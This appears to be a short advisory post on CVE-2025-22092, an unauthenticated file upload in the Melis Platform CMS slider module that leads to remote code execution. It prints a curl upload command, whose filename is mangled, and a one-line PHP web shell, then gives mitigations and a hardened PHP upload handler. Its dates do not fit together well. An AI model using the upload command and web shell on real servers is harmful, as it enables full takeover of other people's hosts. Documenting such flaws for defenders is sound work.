Melis Platform CMS, Unauthenticated File Upload Leading to RCE, CVE-2025-22092 (Critical)


How the mentioned CVE works:

The vulnerability lies in the 'melis-cms-slider' module of Melis Platform. The endpoint '/melis/MelisCmsSlider/MelisCmsSliderDetails/saveDetailsForm' accepts a file upload in the 'mcsdetail_img' parameter, but it neither verifies that the request comes from an authenticated session nor validates the contents of the uploaded file. An attacker can therefore send a direct, unauthenticated POST request that uploads a file with a .php extension, such as a web shell, bypassing the intended security controls. The file is stored in a publicly accessible web directory, so requesting its URL in a browser causes the server to execute it, giving the attacker unauthenticated Remote Code Execution and full control of the underlying host.
Platform: Melis Platform
Version: (Affected Versions)

Vulnerability : Unauthenticated RCE

Severity: Critical

Date: 2024-10-08

Prediction: Patch by 2024-10-25

What Undercode Says:

curl -X POST http://<target>/melis/MelisCmsSlider/MelisCmsSliderDetails/saveDetailsForm -F "[email protected]"
<?php system($_GET['cmd']); ?>

How the Exploit Works:

Direct unauthenticated HTTP request.

Uploads malicious PHP file.

Triggers the file for RCE.

Protection from this CVE:

Apply vendor patch.

Implement strong file-type verification.

Restrict upload directory execution.
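The two mitigations above (strong file-type verification and no script execution in the upload directory) as an added PHP example; this is not Melis Platform's own code, and the upload directory, the $isAuthenticated flag and the storeSliderImage name are assumptions:

```php
<?php
// Added example (not Melis Platform code): a hardened handler for an image
// upload field such as 'mcsdetail_img'. Directory and function names are assumed.

const UPLOAD_DIR = __DIR__ . '/public/media/slider'; // assumed storage directory
const MAX_BYTES  = 2 * 1024 * 1024;

// Extension -> MIME type the content must match. Anything else (.php, .phtml, .phar, ...) is rejected.
const ALLOWED = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];

/**
 * Validates one $_FILES entry and returns the path it was stored at.
 * Throws RuntimeException on any failure so the caller can answer 400/403.
 */
function storeSliderImage(array $file, bool $isAuthenticated): string
{
    // 1. The original flaw: the endpoint never checked the session. Check it first.
    if (!$isAuthenticated) {
        throw new RuntimeException('authentication required', 403);
    }
    $tmp = $file['tmp_name'] ?? '';
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || !is_uploaded_file($tmp)) {
        throw new RuntimeException('invalid upload', 400);
    }
    if (($file['size'] ?? 0) > MAX_BYTES) {
        throw new RuntimeException('file too large', 400);
    }
    // 2. Extension allowlist, read from the client-supplied name but never reused as-is.
    $ext = strtolower(pathinfo($file['name'] ?? '', PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException('extension not allowed', 400);
    }
    // 3. Content checks: magic bytes via finfo and a parseable image header via getimagesize.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    $info = @getimagesize($tmp);
    if ($mime !== ALLOWED[$ext] || $info === false || $info['mime'] !== ALLOWED[$ext]) {
        throw new RuntimeException('content does not match an allowed image type', 400);
    }
    // 4. Server-generated name: no attacker-controlled path or extension reaches disk.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($tmp, $dest)) {
        throw new RuntimeException('could not store file', 500);
    }
    chmod($dest, 0644);
    return $dest;
}

// Usage in a controller action (assumed):
// $path = storeSliderImage($_FILES['mcsdetail_img'] ?? [], $session->isLoggedIn());
// Pair this with a web-server rule that disables script execution under UPLOAD_DIR,
// e.g. "php_flag engine off" in an Apache .htaccess (mod_php), or an nginx location
// for that path with no fastcgi_pass, so even a mis-validated file is served as data.
```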

Impact:

Complete system compromise.

Unauthenticated attacker access.

Arbitrary code execution.


Sources:

Reported By: github.com